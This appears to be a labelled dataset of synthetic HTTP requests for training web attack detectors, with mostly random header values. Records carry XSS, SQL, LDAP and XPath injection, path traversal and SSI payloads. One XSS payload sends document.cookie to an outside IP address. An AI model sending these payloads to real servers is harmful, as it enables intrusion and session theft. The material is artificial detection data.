Upgrade: mlttO/1.7, njrE/6.1
Warning: 967 www.etmh8ee.tiff "wey2naaecwy" "Wed, 20 Jul 05 21:29:25 GMT"
----: ----------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 46041
Start - Id: 47356
class: XSS
GET /Reoo/tbBlttgJDjw-2_/atZbthLi-6f/0srernaRonn/mtetdblrsussefc/2E22lKXQwEo/FFIl.asp?tanyodrh2npcn=i&1h=i%3Ein+1h&avddLne=%3Cimg+++++src%3D%26%7B%5Balert++++%28%27rpata%27%29%3B%5D%7D%3B%3E&oN9glebihgxa4yr=388971 HTTP/1.0
Host: www.qsteti.it
Connection: dnhisd
Accept: image/jpeg;q=0.7, text/xml;q=0.2
Accept-Charset: *;q=0.1
Accept-Encoding: compress;q=0.1, deflate;q=0.3, deflate, deflate
Accept-Language: *
Cache-Control: max-age=360
Client-ip: 46.13.165.123
Cookie: kiarhE21srkCdEn=tni;tmthro5pXtl=53955950;iap=1631475530;ncreanY7=pgutsovsfeokdwonN;nirsr=5
Cookie2: $Version="10"
Date: Fri, 15 Jul 05 23:55:30 CET
ETag: "@mde0ZusAb@AO0tf@n"
Expect: 100-continue
From: hrsita@gtnEqlet.org
If-Modified-Since: Sun, 11 Oct 09 05:32:28 UTC
If-Unmodified-Since: Sun, 05 Jul 09 12:41:16 GMT
If-Match: "@j4e_aIs.vVcPL8PK"
If-None-Match: *
If-Range: Fri, 03 Mar 06 22:02:17 UTC
Max-Forwards: 187
MIME-Version: 8.1
Pragma: ocsw=g
Proxy-Authorization: Basic ZW9pcWVsZzptdHNsRA==
Authorization: tzlma dsiixmto=lersh
Range: -066761,152-
Referer: http://oess.st/assdi/i3ro3d/EtegiOm/doP8hat.tar
TE: deflate
Trailer: Trailer
User-Agent: Mozilla/8.3 (X11; U; Unix 5.3; wg-kh; rv:0.4.7) Gecko/62046959
UA-CPU: MIPS
UA-Disp: 2126,5333,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 781x9042
Via: 0.7 131.2.232.165, 4.2 53.179.27.137
Transfer-Encoding: deflate
Upgrade: ek7/9.9, ih4i/2.6, tncaf/1.8, fikd/2.8, enm/1.6
Warning: 942 133.3.67.151 "re4lwp" "Wed, 23 Jun 04 23:49:55 CET"
X-Forwarded-For: 216.123.220.178
X-Serial-Number: 0450626600564347
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47356
Start - Id: 41194
class: SqlInjection
GET /eod/D7Emocha@o-.sJ.W/all5positionQ99@S9beSEZ/he.mdb?Ygroup byit3AJg@having=i+zetx+&aotekb2th=6sreTnntgut7tna&naslAaol=aehrg%263+k&aht6eR3o6e2cuFD=1eBeessnRsseyrj&u2EAwdkwe=871&bomtesr=eUreaJe&ai=lkLR7T&r2hdonl=7294&eunv4tbEwLbeoe=7otdemih&gm=70069505 HTTP/1.1
Host: 242.15.55.69:773
Connection: close
Accept: text/*, image/*
Accept-Charset: euc-tw, iso-8859-9, iso-8859-2
Accept-Encoding: ';   insert     into     2Lor1  values(666,'zrra','nu',0xfffff)
Accept-Language: *
Cache-Control: uhvmisq=oi
Client-ip: 75.232.65.99
Cookie: fhuV=423276
Cookie2: $Version="63"
Date: Thu, 04 Feb 10 21:06:42 CET
ETag: "ThY1cTTEqxmOVuYl"
Expect: ewi8imt=Eenc
From: hnrnbiad@nJninesrqA.biz
If-Modified-Since: Mon, 06 Feb 06 05:55:25 UTC
If-Unmodified-Since: Mon, 03 May 04 11:37:11 UTC
If-Match: "jnksdr871tGvO5vo"
If-None-Match: "IDvKLHD.HOVml1XGxW"
If-Range: *
Max-Forwards: 1
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: Basic dGxzUDpoZW92aQ==
Authorization: Digest nc=a7b03f6A
Range: 0731-3915
Referer: /imnENun.jsp
TE: trailers
Trailer: Referer
User-Agent: Mozilla/8.8 (X11; U; SunOS sun4u 4.8; aa-so; rv:1.8.7) Gecko/62068861
UA-CPU: x86
UA-Disp: 8221,0714,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 9560x6945
Via: torvoA/6.2 www.yDo8s.tiff
Transfer-Encoding: identity
Upgrade: eijtn/6.7, lQnT/6.1, aomess/4.2, rhpltp/2.7
Warning: 985 www.enaw.tiff "drga" "Tue, 12 Feb 08 13:07:34 CET"
X-Forwarded-For: 25.2.55.98
X-Serial-Number: 7584461693588
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41194
Start - Id: 46616
class: XSS
GET /olex.gif?asextncd9hntks=vIY%3D7m%3C3eassobsmvSoh&4j=m&dryT=sseiwzoet1h HTTP/1.1
Host: www.eeDNs6aqp.cz:3
Connection: 1sps
Accept: image/png, audio/*, application/zip
Accept-Charset: *
Accept-Encoding: <<script >[window.open('http://197.66.166.228/leesni.mspx'+document.cookie);]</script  >
Accept-Language: *
Cache-Control: max-stale=3699
Client-ip: 62.31.239.217
Cookie: g6aocn=3304725;atitasbejitvh=efuleze9hpben;eyncb=pinsa;n76iEpt1eea1r=4415528938
Cookie2: $Version="976"
Date: Tue, 18 Oct 05 10:08:45 GMT
ETag: "_ek5GFvMhnXVSDU6b"
Expect: 100-continue
From: itwrt@4wirn.uk
If-Modified-Since: Sat, 25 Jul 09 12:14:04 CET
If-Unmodified-Since: Mon, 09 Aug 04 16:04:15 UTC
If-Match: "b-FuryhPv9jU2pMW"
If-None-Match: "LrjgmSYV3Hth1w2"
If-Range: Fri, 28 Dec 07 15:06:22 UTC
Max-Forwards: 0000
MIME-Version: 3.6
Pragma: sadt=0wsoOt
Proxy-Authorization: 1cesn etzgcum=3f2cr
Authorization: 7rxig eeii=nrynliaz
Range: 7283-8
Referer: http://www.alhRcotm.biz/e8dati.pl
TE: gzip,gzip;q=0.4,gzip;q=0.8
Trailer: Connection
User-Agent: Mozilla/8.5 (compatible; MSIE 5.2; Linux i586; NPonoixf)
UA-CPU: PowerPC
UA-Disp: 7714,181,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 950x529
Via: 8tmt/7.0 www.v7vn.tiff, 1.7 120.174.37.206
Transfer-Encoding: deflate
Upgrade: 1ssnt/2.7, Necil/0.4
Warning: 749 169.197.175.54 "aTaul8Deeyii" "Wed, 21 Apr 04 19:11:25 GMT"
X-Forwarded-For: 245.134.55.175
X-Serial-Number: 24556
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46616
Start - Id: 37010
class: LdapInjection
GET /nXr4zy/rgshteirsca8o/dN3gb/5HLHbinedFsock_streamM/e8g6DMpw1OwMFdAg/lTPMC9gow/jzA2N/e@UT/lL.php?anass=tnRCttrdvusropt&deriyai=vcI0e-&fgqeemeirSeq=in%29%28%7C+++%28rhcr%3D*%29&eseaYa2nocaUem=aS3+ireei&sYohrw6=wHo9zM HTTP/1.1
Host: 26.150.37.219
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: gRb1-OtleAo, fmnngv2P-ws6sEirq;q=0.4, e-wtTRb
Cache-Control: no-cache
Client-ip: 26.49.55.189
Cookie: 6ae=46407;te1io5301IorE=nfftp;rqauin=91742;eot8irw=5265145;ysthuoeoi=|5;urnt=14
Cookie2: $Version="777"
Date: Sun, 16 Oct 05 20:10:51 UTC
ETag: "wRhCcv9Re9WpU6WH86K1"
Expect: 100-continue
From: ete2k@zfNl4.de
If-Modified-Since: Sun, 20 Jan 08 11:01:09 GMT
If-Unmodified-Since: Thu, 08 Jun 06 24:59:21 CET
If-Match: ".acXrwbdxMtqbN0KX"
If-None-Match: "ToxdwizwbQJF.UzWqV"
If-Range: "4Y2TTD-en6pWwtvGK"
Max-Forwards: 73
MIME-Version: 6.2
Pragma: h='Mlihd'
Proxy-Authorization: NTLM bjhjeWN6aXRhb2VyY2VzcnBvOXloU2Y1dnJsdGhsNnRyOG5pb2N4TE4=
Authorization: loail 3ocknwn=r0hh
Range: 11-,-9658
Referer: http://www.wTdfEm.cz/e4jiMhsn/nuttnoon/qyzodatd.css
TE: gzip;q=0.0
Trailer: Cache-Control
User-Agent: Mozilla/4.1 (compatible; MSIE 9.0; Win98; d0hf; medsdoe; n06zdeAub)
UA-CPU: StrongARM
UA-Disp: 720,086,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 8274x205
Via: HTTP/9.7 www.7hArsfey.htm, rah/0.9 153.196.192.66
Transfer-Encoding: 2ril2; eaqc=nanho
Upgrade: dho/9.5, 3oax/1.9
Warning: 992 www.dyteeg.tiff "riPlyr" 
X-Forwarded-For: 164.143.217.25
X-Serial-Number: 4092233930
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37010
Start - Id: 35109
class: SqlInjection
GET /tit-qmv9tdn/EA/oramtn/gIXD2.mdb? HTTP/1.1
Host: www.eaauo.st
Connection: close
Accept: image/png;q=0.5, application/zip;q=0.1
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: wnI4rhT-lhreIu, hsrfuq-lr;q=0.3, bFoPd-d3b;q=0.2, tdlaomux-Hlis7til;q=0.8, n-e
Client-ip: 148.245.176.190
Cookie: jtsehioc6drl=OR   'ssi8' =     'Sim'+'ple'
Date: Sat, 10 Dec 05 20:35:05 GMT
Expect: 100-continue
If-Modified-Since: Wed, 09 Jan 08 06:39:32 GMT
If-Match: *
If-Range: Sat, 09 Jan 10 06:09:39 UTC
Max-Forwards: 4
Pragma: no-cache
Referer: /0mchY.php
TE: trailers,trailers
User-Agent: hzaIh (cqHBl0W; aN@os.9Si)
Via: HTTP/8.6 172.20.253.88

null

End - Id: 35109
Start - Id: 35787
class: XPathInjection
GET /spFfUhYcSG4e4-pga/Dblowagr/usaigc/2ay/ownhetdadlhe.swf?jKorad=nXwVXuQ2&yeexqi=5&zhRZrah=40401756&xraaSissis=l2aebnTs&tV3Lp-_FoSEm=0934&C3BJNxo.3f=n%26ecPadoy&eeSyeaemoae=3956169&n1E=38&oa=gyrtgov1nalhfrd6il&aSdvbscript=bhh&cwindow.openj7k=evobUytBQ&adTrbben8ig=5859+or++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D++++%7C+++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+++++or+++9827%3D&xwbeeaehcureedH=%5BteE4T%25&wrekeTed=m%7Eof+ HTTP/1.1
Host: 70.107.228.162:2508
Connection: keep-alive
Accept: video/quicktime;q=0.1, video/*;q=0.0
Accept-Charset: *
Accept-Encoding: *;q=0.8
Accept-Language: *
Cache-Control: max-stale=3239
Client-ip: 200.26.183.185
Cookie: yrhh1i0l4b0r=tvechotexec3rnrsiajr9a;1phiyi=n;ibsrelerug=;:l;lnRoiEtnso=tttexec;Eass=esAs+a1]buy
Cookie2: $Version="7"
Date: Tue, 09 Mar 10 21:56:54 UTC
ETag: "S7hKnppQ3N92HRjMm_"
Expect: tz6uti0s=zmuahwp;imcC=ywma7
From: h3ni@Eb7nestF.gov
If-Modified-Since: Sun, 01 Jun 08 24:21:11 CET
If-Unmodified-Since: Thu, 23 Jul 09 01:34:02 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 37
MIME-Version: 5.9
Pragma: no-cache
Proxy-Authorization: aten uiro=tanhlba
Authorization: NTLM VGlpYXBsaGlydHI4a25Lc3VwYTNOZWlzVGFhY2doYWk4ZWVz
Range: -085771,9-0488,1-16184
Referer: http://eksNijeo.uk/ahRrNm/k2hWtetr/4neee/stTr2eO8/ueAm.swf
TE: gzip,trailers
Trailer: Expect
User-Agent: 00PFG0rvkL http://www.ean5y.fr
UA-CPU: x86
UA-Disp: 7633,886,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 072x540
Via: 3.4 19.21.64.198:6097, Sahein/1.8 112.174.8.216:4960
Transfer-Encoding: compress
Upgrade: homom/1.1, t6u/8.5, 6mrrds/0.2, yassta/4.9
Warning: 856 www.tesn.js "kvooddadai8neb" 
X-Forwarded-For: 142.75.180.148
X-Serial-Number: 9305784502
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 35787
Start - Id: 37926
class: LdapInjection
GET /clr/exM16_Dof5iH/eLpfwactecsa/w@dTmeS77x/ug/sZPm/totkta0/ft/s_XPY/ex/8h2amoYsynajiaulf/id4tNb.jpg?5rDddlRevo=i&wj1=sp&ona6die1iU=Ts%3Cpidx%3A%28ann&sEtnssswtr=eewe%5DchO&UIc=%2B9e+script&1ielaidue2ceid=088&wnRD9rRVUin=%29+%28+%7C++%28++++cn%3D*o+%27brien*%29%28mail++++%3D*o+++%27brien*+%29+&sr=674&object277home=eoAaewtdxdMws HTTP/1.0
Host: www.oeooex8.st
Connection: dtRD
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: sdqk-tkVttltt;q=0.4, iraaolh-wla;q=0.8
Cache-Control: only-if-cached
Client-ip: 68.144.9.61
Cookie: iueiEMyreig6ly=a1>tvarcibd<lhN<n;2wnliia7=4315742450;mtiweqmewt=85 ;il64yom=77;k8tfeaboMhLxa=06
Cookie2: $Version="988"
Date: Thu, 23 Sep 04 06:06:24 UTC
ETag: "yzFFwi2xkZtkbQro8al"
Expect: dtawu=4tsB
From: zoeyt@dfSho.com
If-Modified-Since: Tue, 27 Feb 07 22:02:24 CET
If-Unmodified-Since: Wed, 21 Sep 05 06:59:25 GMT
If-Match: *
If-None-Match: "GbVs1amUiJ9h-9Hn0"
If-Range: Tue, 01 Apr 08 03:09:34 GMT
Max-Forwards: 97
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: NTLM b252ZXUxdWlpY3l1YXVkbHVoNGxlc2htYW1BaG4ybnJa
Authorization: ffwo gostPoe8=llnctoy
Range: 478-6,9746-59,-9293
Referer: http://whmlla2d.cz/shis.rar
TE: trailers
Trailer: Upgrade
User-Agent: Mozilla/0.4 (Machintosh; U; PPC Mac OS X 7.6; gi-rc; rv:0.5.8) Gecko/78872820
UA-CPU: MIPS
UA-Disp: 472,2226,8
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 649x451
Via: 0.6 www.vhpCtwa.html, FTP/3.4 164.7.65.205:787, FTP/7.7 198.28.250.219
Transfer-Encoding: AoOi3; hapenhoa=tnbt
Upgrade: udtE/5.5, hiteNc/1.2, tffIc/7.5, nhr/8.0, ptIvu/0.9
Warning: 778 www.sriAh.html "u4ef" 
X-Forwarded-For: 143.12.94.194
X-Serial-Number: 03021
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37926
Start - Id: 45286
class: PathTransversal
GET /iXLFbC4EBDtrkbH.N1K/eesoongohloaiSiykzUs/4M/a_NQ/i3@/rVZET/ev046r9ce/fmGy9485R94At.mdb?nnot=ptdeletedc%288vaE4&n4t4=znwhereura&l.hfqehg=a7jnd6d8hssrbt&moaeao4=clKmm%7Coohtacces&tNaf=z&eOoan=%7E%28Phor+e9 HTTP/1.0
Host: www.sh4hu3.st
Connection: keep-alive
Accept: video/*;q=0.5, image/*, image/*;q=0.0
Accept-Charset: big5;q=0.1, euc-jp, euc-kr, windows-1257;q=0.3
Accept-Encoding: *;q=0.0
Accept-Language: f0oxer-h;q=0.8, e-e98ah
Cache-Control: no-store
Client-ip: 253.245.176.25
Cookie: ne0dtxe6=ipp
Cookie2: $Version="4"
Date: Mon, 19 Mar 07 06:01:05 UTC
ETag: W/"5sS.bHdpvUqWsjVo-1h"
Expect: ruRriaR=bioddtes;bsfxiao=2oktcsxn
From: eHayb@eTitoou.com
If-Modified-Since: Sat, 11 Jul 09 14:43:23 UTC
If-Unmodified-Since: Wed, 22 Feb 06 10:11:31 UTC
If-Match: "XEjffJGz31bk2n7Fs"
If-None-Match: "yw6.OSZM7TYq7My"
If-Range: *
Max-Forwards: 70
Pragma: orthNhu=mdx
Proxy-Authorization: Basic b1F1enNlOmR4cnFlYg==
Authorization: Basic NjBycjJyOmhub2I=
Range: 40-,396156-542
Referer: http://www.wyossyoo.fr/oesso/ntere/tmerh/sanspho/87nHi.jsp
TE: trailers,gzip;q=0.8,chunked;q=0.7
Trailer: TE
User-Agent: ../../../WINDOWS/autoexec.bat
UA-OS: Win9x
UA-Pixels: 8576x7305
Via: jr5/7.7 67.152.192.239, 7.6 www.6ttB.htm, FTP/8.3 235.1.202.39:64
Transfer-Encoding: identity
Upgrade: sY7kva/6.7, wn5/7.5
Warning: 022 246.223.178.94:2891 "umhssfmiFhwrIlra" "Sat, 10 Sep 05 05:37:31 GMT"
X-Forwarded-For: 238.149.119.17
X-Serial-Number: 1947313
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45286
Start - Id: 38036
class: LdapInjection
GET /tnOccikiIfa6aAq.htm?VBiLnb=co7&MBqEg=2786704441&dspse9suhvmy=a7Z%29%28%7C+++%289c4hL%3D*%29 HTTP/1.0
Host: 218.250.225.89
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 132.58.25.160
Cookie: gbichE70d=+lsE;topiFiahrahda=8mhs;9fws=31178361;vSaperlPbNc-A=ochildkQoetrvbscript
Cookie2: $Version="23"
Date: Wed, 21 Jun 06 03:41:14 GMT
ETag: "4A@c64fauOD7zKA-S"
Expect: 100-continue
From: deigiel@Ostrbaef.it
If-Modified-Since: Tue, 15 Sep 09 20:04:22 CET
If-Unmodified-Since: Tue, 13 Oct 09 03:34:09 CET
If-Match: *
If-None-Match: *
If-Range: "kwWSFsoczEiUFRP5kPO0"
Max-Forwards: 2952
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: NTLM eW9hQm41aGRzYkZwdG9yc3Roc2Ftd3BrYXdySTR4aGFt
Authorization: of2es dbq0td=t9rej
Range: 33-,6951-
Referer: /AnaEise.jsp
TE: trailers,deflate;q=0.1
Trailer: Cache-Control
User-Agent: npu6J@x http://www.7e8tpI.cz
UA-CPU: MIPS
UA-Disp: 879,787,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 427x816
Via: 6.0 www.uh7kui.shtml, 7.3 www.eIfur9u.js, HTTP/5.9 www.u9rd.htm
Transfer-Encoding: identity
Upgrade: ttnx/4.7, Mocaid/6.1, lsgsia/7.3, sekx/3.8
Warning: 684 151.9.243.38 "piufAer70OehrhadSaho" "Sun, 23 Jul 06 03:35:28 UTC"
X-Forwarded-For: 212.17.65.81
X-Serial-Number: 94095568311644
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38036
Start - Id: 45354
class: PathTransversal
POST /eTPh4TyssRich2Ekol/u86CqDdivx/sAMz43-c6AmjZ6/Swget58zuOqt.h/loy/ioednize/TBLjnetcatLGJdg./u2tSzDPjtleGUG8obG/cdJYUT26uhydG/caleuNrtr2fhi.cfm? HTTP/1.0
Content-Length: 208
Content-Language: etthhEF,un
Content-Encoding: identity
Content-Location: http://www.Qeel.gov/Ewoodsdl/teGadzaa/eepetsr.dll
Content-MD5: aDFsbnJ0ZXRxdGRucmhFZQ==
Content-Type: application/x-www-form-urlencoded
Host: www.pySnst.com
Connection: 3vie
Accept: */*;q=0.1
Accept-Charset: *;q=0.2
Accept-Encoding: deflate, deflate;q=0.4, compress;q=0.0, compress
Accept-Language: wspv-e5sste;q=0.9, c66-nkqeSp;q=0.4
Cache-Control: min-fresh=96848
Client-ip: 66.195.135.123
Cookie2: $Version="3"
Date: Sun, 13 Apr 08 05:32:13 CET
ETag: "s2pefc_1WGvDRXu.vkU"
If-Modified-Since: Wed, 16 Dec 09 10:23:14 UTC
If-Unmodified-Since: Thu, 18 Feb 10 05:46:32 UTC
If-Match: "cPlT8XJaf@1J1QyttM"
If-Range: Tue, 24 Jul 07 14:23:05 GMT
Max-Forwards: 96
Pragma: cnIs=aryeu
Proxy-Authorization: NTLM OWl0bmdqbmhuZTZNbmllYnJUS1NlZTBvbW5yaXJvRWFpZ2VlaGUxZURzYWd4
Referer: /ieen5Esr/ne4Ernn/wCsls4/aumV/tspgrrqE.mdb
Trailer: If-Modified-Since
User-Agent: Mozilla/8.0 (X11; U; SunOS sun4u 8.8; uO-wt; rv:5.2.5) Gecko/68416764
Transfer-Encoding: identity
Warning: 500 www.csfpew.js "Upisof2goah" 
----: ----------------------

processing-instructionuGb12OHunionu=596&ssoifklaeleh=eD-QR7s3vLML&lei2soethsue=2s-k8EYxD&tlnnogjdiaitd9=107&tnEii=k &I9e5kehnurXgau5=../../../../../../WINDOWS/autoexec.bat&hEns=et6nJami0sol3omhs

End - Id: 45354
Start - Id: 49275
class: XPathInjection
GET /oty6tiaWweupan7e/ipisyiabzneyiynie/nddiEeeoh/umdtsrwttw5av/Ancbgsound/tluewilhytsec1i/uAse4uLi/AsLJ673p/Set2s/yVtq/i0xdu/uecdefatteanxs4n7e.exe?6eitty5rbSOi=lega&RYPD0atelnet.=h4atthjatmceatz4&st=149170&aflhiwAnozio=01601&es9ndzt29jmrst=ebetbw%27+++or++1%3C+++enw%2FdrKhqn%2Fnyaea%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D403%5D++or++++%27ra%27%3D+%27&yheer5tver=taeh1Iee&Ui-DFXsX=mnurhessegtDsnce&enwqeWgana=x&mgrtH=7ihkA&8sipnfeedfsg2bo=780887482&le9E1ro6rhu75=sbHosUac HTTP/1.0
Host: www.xTholrsTo0.uk
Connection: keep-alive
Accept: image/*, audio/basic;q=0.0, application/*
Accept-Charset: iso-8859-9;q=0.6, euc-kr
Accept-Encoding: gzip, gzip;q=0.5, deflate
Accept-Language: *;q=0.8
Cache-Control: only-if-cached
Client-ip: 88.174.167.80
Cookie: nzr=:ibetweene+
Cookie2: $Version="037"
Date: Wed, 14 Feb 07 09:05:12 UTC
ETag: W/"JPmR9_9ZPrUkFgwSt4"
Expect: nimaee=lNou1m
From: ttIceawb@smJnerkeg.com
If-Modified-Since: Sat, 13 Sep 08 22:08:48 UTC
If-Unmodified-Since: Mon, 18 Aug 08 04:58:59 CET
If-Match: "K2Yn5Nj@JULkEXe"
If-None-Match: "oj94sEpPv0i0XZys9"
If-Range: "zffv5BtAyOTFQc2yf6"
Max-Forwards: 457
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: NTLM ZWFTNWlvZXFpZXV0YWhuMHVuZGhhZG9xZXEwNW4wbmtkbnFu
Authorization: Basic bmRhb25TYkw6Y2U0cg==
Range: 8-,-6,95877-955
Referer: /wreotaat/oehacpb/ooy4ic.txt
TE: gzip,trailers,chunked
Trailer: Trailer
User-Agent: Mozilla/0.4 (X11; U; Open BSD i586 8.1; 9z-mz; rv:0.7.4) Gecko/57323082
UA-CPU: StrongARM
UA-Disp: 3091,890,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 666x0440
Via: FTP/9.7 144.243.219.213, oDael/3.5 www.8aQcmS.css
Transfer-Encoding: gzip
Upgrade: iedn/7.3, nh9e/5.6, 2l7Pr/8.1
Warning: 952 www.opnaAke.tiff "wdiercrcmppwienapny" 
X-Forwarded-For: 188.15.164.72
X-Serial-Number: 15070707581939695
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49275
Start - Id: 49991
class: XPathInjection
POST /mrwgcajdyIairfNsesfa/nTw/nINHoKPVew.ds/scbmswR0oEJ7I65B8/cQbmkoZ1AcbE/a1bV2N_BkdRPyf/rfRTJ/8d7ezh6anqRsmiH/KOZWL8qutHP.css? HTTP/1.0
Content-Length: 212
Content-Language: 5ta
Content-Encoding: deflate
Content-Location: /5kos.js
Content-MD5: U2JoZWNpeWlhdDZ1b2VpdA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 15 Jul 06 05:23:58 UTC
Last-Modified: Thu, 31 Dec 09 12:12:52 GMT
Host: 159.162.31.117
Connection: keep-alive
Accept: application/zip
Accept-Charset: euc-cn;q=0.5
Accept-Encoding: compress, deflate, gzip;q=0.2
Accept-Language: *
Cookie: fh=3599108
Date: Mon, 11 Sep 06 22:54:24 GMT
ETag: "B@Z_FoQ6sHQt.m-"
Expect: aef0
From: Hrtiy@r0sqSkft.de
If-Modified-Since: Fri, 13 Oct 06 14:31:55 GMT
If-Unmodified-Since: Sun, 11 Dec 05 19:38:23 GMT
If-Match: *
If-None-Match: *
If-Range: "blQg3L0Ju0EECMW"
Max-Forwards: 635
MIME-Version: 2.4
Pragma: anhe8=t9eenaos
Referer: /ustw3xt/jamredw.tiff
TE: gzip;q=0.9,trailers,gzip
User-Agent: p/r0luh/htn/child::node()[position()=917]  or     'yb9c'    ='
UA-CPU: x86
UA-Pixels: 431x444
Via: FTP/5.4 173.221.77.250, 4.6 www.hheg.gif:6
Transfer-Encoding: gzip
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

AxurnOeohiLU6st=te5>i&e@7_Qp5VgOU3=3849&5t=gaz3yyNof&Bwexec8OvYcmdZC9=e45GbP2&Jjhqweo85evre=miizy&rR=w uav&8XM22hICot2p=lhhdecinrdatba&fmedno=72&e89Tt=a57dc2>uiad&eHn2tr=0585&rgLupdatek-SCLFd=46&iineGopge=kcs

End - Id: 49991
Start - Id: 39161
class: SSI
GET /jGO4m5dLu7fFbIwcM/nI1XQsJ.nE1D/lwv1FKxgBNSy59h/xyhS/ct6TeevErtr6th/oxtR/iW..ptPnWWp2RCNvvZ.V/usro@bZ0ZJzconnectxPBy/bo_bPpOGX8528-CMR5w.css? HTTP/1.0
Host: www.6ogqtacq.gov
Connection: keep-alive
Accept: text/*
Accept-Charset: *;q=0.9
Accept-Encoding: compress, deflate, identity;q=0.0
Accept-Language: nioDM-kjddlt, aiev81g-omlustd;q=0.6
Cache-Control: no-store
Client-ip: 155.131.249.217
Cookie: na9bT=oe|ei];pO2srttnensi7==6uZgnull;2aEesansuaigeXa=+t22e1ltce ;eriletiur3fxad=<!--#echo var="date_gmt"-->
Date: Wed, 13 Feb 08 24:20:37 UTC
If-Modified-Since: Thu, 18 Nov 04 16:58:03 UTC
If-Unmodified-Since: Mon, 14 May 07 08:10:38 CET
Max-Forwards: 1
Authorization: tedfy e9eDr=pesnZ
Referer: /Hi0ealhu.tiff
TE: chunked;q=0.6
User-Agent: Mozilla/4.1 (X11; U; Open BSD i586 5.7; lr-p5; rv:7.8.0) Gecko/37140691
Via: HTTP/0.2 www.octsC1t.shtml
Transfer-Encoding: qeertl
----: -------------

null

End - Id: 39161
Start - Id: 47902
class: XSS
GET /7ftpaCRKGc2i5b/aMtsvsd9a1oBj2-wS/CJIKwGpFB3D0/hhb0WEG.nsf?bno5gslJqurlr=tndeeEtnbWy+i&afrebe4UdSkhi=+ggeyeDtc%26l%3Eba%27&iemnI=Eio+style%3Dleft%3Aexpression%28alert++++%28rsR.3lgOoy%29%29&sm3H=074298&zEEp=CsxeCoieeixrui&uerihm6tia=4081756231&y1i=Olktea&adle=51&TmAbee9s2eAtlt=rdd HTTP/1.0
Host: www.elAstkhbbi.uk:0
Connection: keep-alive
Accept: video/mpeg
Accept-Charset: hz-gb-2312, iso-8859-8-i;q=0.1, x-mac-roman;q=0.8, windows-1257
Accept-Encoding: gzip;q=0.2, deflate, identity
Accept-Language: fO-mnwswe, rr-tgryoey, Os-zyee
Cache-Control: ioaesrep='lu'
Client-ip: 73.100.104.87
Cookie: oRcEaemmgoeeo=9501;MoluRpB=tuP5;o8neia9lpere=dtNals<tpoyamixtau;eDhtE=yr;2eueoHhoIhoetwe=595953;ks9rse1b=Pbgsounda>e echoto2tr
Cookie2: $Version="04"
Date: Sat, 19 Jul 08 03:28:54 GMT
ETag: W/"sMWA4udOhaWo3S40bpz"
Expect: reeofnse
From: rigu@deao.net
If-Modified-Since: Mon, 23 Jul 07 11:48:31 GMT
If-Unmodified-Since: Sat, 17 Sep 05 24:32:39 CET
If-Match: "bvb3LuTjSIw@qID"
If-None-Match: "uFA8eu01lA2N9_OH"
If-Range: "JRA3Z@PzKBKNJHK7pU"
Max-Forwards: 4577
MIME-Version: 5.0
Pragma: no-cache
Proxy-Authorization: NTLM c2lzZXVkcXNvT252d3NzNWlSbmVsc3NUcnZvZXVCNm90MnhlU250c1M1ZWVPZGV1
Authorization: Digest algorithm=MD5
Range: 53066-01
Referer: /pyoha.msf
TE: chunked;q=0.6,deflate;q=0.6,chunked;q=0.4
Trailer: Authorization
User-Agent: Mozilla/4.9 (compatible; Konqueror/3.1; Windows NT; r3nt; pepktL; rvy3)
UA-CPU: x86
UA-Disp: 213,2027,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 229x467
Via: 6.8 106.134.189.19, 2.8 www.rhbc4.shtml, FTP/0.8 170.95.147.23
Transfer-Encoding: pRlae
Upgrade: anee5/8.2, scSotq/7.5, 3th/0.1, krezts/1.0
Warning: 274 128.194.66.58 "9hsdoz" "Fri, 21 Jan 05 16:59:18 CET"
X-Forwarded-For: 208.27.214.144
X-Serial-Number: 8754080340538
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47902
Start - Id: 45545
class: PathTransversal
